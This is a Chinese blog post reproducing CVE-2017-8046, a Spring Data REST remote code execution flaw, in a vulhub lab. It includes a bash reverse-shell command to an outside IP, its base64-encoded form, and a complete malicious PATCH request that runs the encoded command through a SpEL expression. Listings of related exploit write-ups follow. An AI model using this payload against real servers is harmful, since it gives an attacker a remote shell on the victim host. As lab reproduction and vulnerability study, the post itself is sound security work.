vulhub中spring的CVE-2017-8046漏洞复现

已于 2024-02-02 14:36:14 修改
阅读量331 收藏 8
点赞数 8
分类专栏: vulhub漏洞复现 文章标签: spring java 后端
于 2023-11-29 20:59:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yougexiaojiuguan/article/details/134697503
版权

漏洞原理

Spring-data-rest服务器在处理PATCH请求时,攻击者可以构造恶意的PATCH请求并发送给spring-date-rest服务器,通过构造好的JSON数据来执行任意Java代码


影响版本


Spring Data REST versions < 2.5.12, 2.6.7, 3.0 RC3
Spring Boot version < 2.0.0M4
Spring Data release trains < Kay-RC3

具体过程

打开环境后可以看到这个页面

可以利用代码块生成Ascii的命令

payload = b'touch /tmp/success'
bytecode = ','.join(str(i) for i in list(payload))
print(bytecode)
就不尝试创建seccess文件了,直接利用

bash -i >& /dev/tcp/192.168.140.43/7777 0>&1

base64编码后得到

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE0MC40My83Nzc3IDA+JjE=

和bash反弹连接命令拼接得到

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE0MC40My83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}'

利用代码对拼接后的payload转换为ascii码

payload = b'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE0MC40My83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}'
bytecode = ','.join(str(i) for i in list(payload))
print(bytecode)

通过burpsuite发送POC后

PATCH /customers/1 HTTP/1.1
Host: 192.168.188.128:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json-patch+json
Content-Length: 456

[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{98,97,115,104,32,45,99,32,123,101,99,104,111,44,89,109,70,122,97,67,65,116,97,83,65,43,74,105,65,118,90,71,86,50,76,51,82,106,99,67,56,120,79,84,73,117,77,84,89,52,76,106,69,48,77,67,52,48,77,121,56,51,78,122,99,51,73,68,65,43,74,106,69,61,125,124,123,98,97,115,101,54,52,44,45,100,125,124,123,98,97,115,104,44,45,105,125}))/lastname", "value": "vulhub" }]

执行成功后,shell成功反弹

在复现过程中好几次shell反弹不过来,重启了环境后才成功

余生有个小酒馆
关注
  • 8
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
vulhub漏洞复现 CVE-2016-3088
03-14
vulhub漏洞复现 CVE-2016-3088
CVE-2017-12615-master.zip
09-04
在`CVE-2017-12615-master.zip`文件,可能包含了用于演示漏洞利用的工具和脚本。这些工具通常会模拟一个恶意的HTTP请求,其包含能够触发远程代码执行的OGNL表达式。攻击者可以使用这些工具测试他们的目标系统...
CVE-2017-8046 Spring Data Rest 远程命令执行漏洞复现(最详细版本)
精品博客,你值得一看~
09-17 663
在REST API的Patch方法(实现RFC6902),path的值被传入setValue,导致执行了SpEL表达式,触发远程命令执行漏洞Spring-data-rest服务器在处理PATCH请求时,攻击者可以构造恶意的PATCH请求并发送给spring-date-rest服务器,通过构造好的JSON数据来执行任意Java代码.先cd到spring目录下的CVE-2017-8046里面,然后使用docker-compose启动环境.一切都准备好之后就可以启动CVE-2017-8046 的环境了.
CVE-2017-8046Spring Data Rest RCE)
weixin_30763455的博客
04-10 213
环境搭建参考第一个链接,springboot启动文件如下,不同的启类,将Application.class修改一下就可以了,直接debug。注意:默认版本是2.0.3版本,修改成低版本,看一下mvn下载的jar包版本 漏洞利用: 第一次请求: 第二次请求: 注意的点: 需要用PATCH方法,而且请求格式为JSON。根据RFC 6902,发送JSON文档结构需要注意以下两点: 1、请...
spring远程命令执行漏洞复现CVE-2017-8046
最新发布
2301_82197189的博客
05-31 241
Spring-data-rest服务器在处理PATCH请求时,攻击者可以构造恶意的PATCH请求并发送给spring-date-rest服务器,通过构造好的JSON数据来执行任意Java代码。
spring CVE-2017-8046 POC
weixin_45427650的博客
04-15 456
为了练习 argparse 库 import requests import json import base64 import argparse def Option_Check(i, headers, payload): try: r = requests.options(i, timeout=0.5) if r.status_code == 200: r = r.text if r.find('patch'):
CVE-2017-8046-Spring Data Rest RCE 漏洞复现
m0_58596609的博客
04-22 1127
CVE-2017-8046-Spring Data Rest RCE 漏洞复现
Spring Data Rest远程命令执行漏洞复现CVE-2017-8046
wutiangui的博客
09-10 394
Spring Data Rest服务器在处理PATCH请求时存在一个远程代码执行漏洞。攻击者通过构造好的JSON数据来执行任意Java代码。将Content-Type指定为application/json-patch+json。使用python将准备执行的代码编码为十进制。访问以下链接,出现如下界面说明存在漏洞。1.准备shell命令。修改方法改为PATCH。
浅谈Node.js CVE-2017-14849 漏洞分析(详细步骤)
10-19
【Node.js CVE-2017-14849 漏洞分析】 Node.js 是一个基于 Chrome V8 引擎的 JavaScript 运行时,它提供了高效的事件驱动、非阻塞 I/O 模型,使得开发高性能的网络应用变得简单。Express,则是建立在 Node.js 平台...
Spring Data Rest 远程命令执行漏洞复现CVE-2017-8046
来到了学渣的博客
11-09 382
环境搭建好后直接访问,漏洞页面如下 看到有/customers和/profile路径 访问请求会发现响应包有json传值 访问/customers和/profile路径 访问json请求给的路径 构造poc http://www.jackson-t.ca/runtime-exec-payloads.html 先对想要执行的命令进行编码然后转ascii码 转ascii直接写了个小脚本 ch=str(input("请输入一串字符:")) a=[] for i in ch: print(i,"
Spring Data Rest 远程命令执行漏洞复现(CVE-2017-8046)
baidu_38844729的博客
07-06 3132
漏洞分析 漏洞原理: Spring-data-rest服务器在处理PATCH请求时,攻击者可以构造恶意的PATCH请求并发送给spring-date-rest服务器,通过构造好的JSON数据来执行任意Java代码 影响版本: Spring Data REST versions < 2.5.12, 2.6.7, 3.0 RC3 Spring Boot version < 2.0.0M4 Spring Data release trains < Kay-RC3 漏洞复现 1、启动环境 cd v
CVE-2017-8046 Spring Data Rest 远程命令执行漏洞
weixin_45715461的博客
08-11 1028
本文只要是学习poc、exp的编写,对于漏洞的原理不进行深入的介绍。
Spring Data Rest 远程命令执行漏洞CVE-2017-8046
黑白的博客
12-20 1208
声明 好好学习,天天向上 漏洞描述 Spring Data REST是一个构建在Spring Data之上,为了帮助开发者更加容易地开发REST风格的Web服务。在REST API的Patch方法(实现RFC6902),path的值被传入setValue,导致执行了SpEL表达式,触发远程命令执行漏洞。 影响范围 pivotal Spring Data REST < 2.5.12 2.6.7 3.0 RC3 pivotal Spring Boot < 2.0.0M4 pivotal Sprin
Spring data rest漏洞在IDEA复现CVE-2017-8046
wxzyyds的博客
11-06 1217
这篇文章主要讲述了spring data rest(CVE-2017-8046)由于spel表达式没有进行过滤而导致的远程RCE,本片文章利用了IDEA的动态调试,实现了对于漏洞产生原因的详细复现
vulhub-Spring Data Rest 远程命令执行漏洞CVE-2017-8046
weixin_42513429的博客
08-20 163
https://vulhub.org/#/environments/spring/CVE-2017-8046/ https://blog.csdn.net/qq_45300786/article/details/119301365 Spring Data Rest 远程命令执行漏洞CVE-2017-8046) 略去docker,仅做复现漏洞记录 访问服务器,看到服务器返回json,根据提示访问customers 抓包访问的/customers/1 修改官方的payload PATCH /cust.
spring-data-rest-rec 复现分析 cve-2017-8046
whatday的专栏
07-06 512
漏洞信息 pivotal发布的漏洞信息如下: Malicious PATCH requests submitted to servers using Spring Data REST backed HTTP resources can use specially crafted JSON data to run arbitrary Java code. 简而言之,就是Spring Data REST对PATCH方法处理不当,导致攻击者能够利用JSON数据造成RCE。本质还是因为spring的SPE
cve-2017-7504漏洞复现
08-23
对于CVE-2017-7504漏洞复现,请注意以下几个步骤: 1. 确认受影响的软件版本:CVE-2017-7504是一个Apache Struts 2框架的远程代码执行漏洞。在复现之前,请确保目标系统运行的是受影响的Apache Struts 2版本。 ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值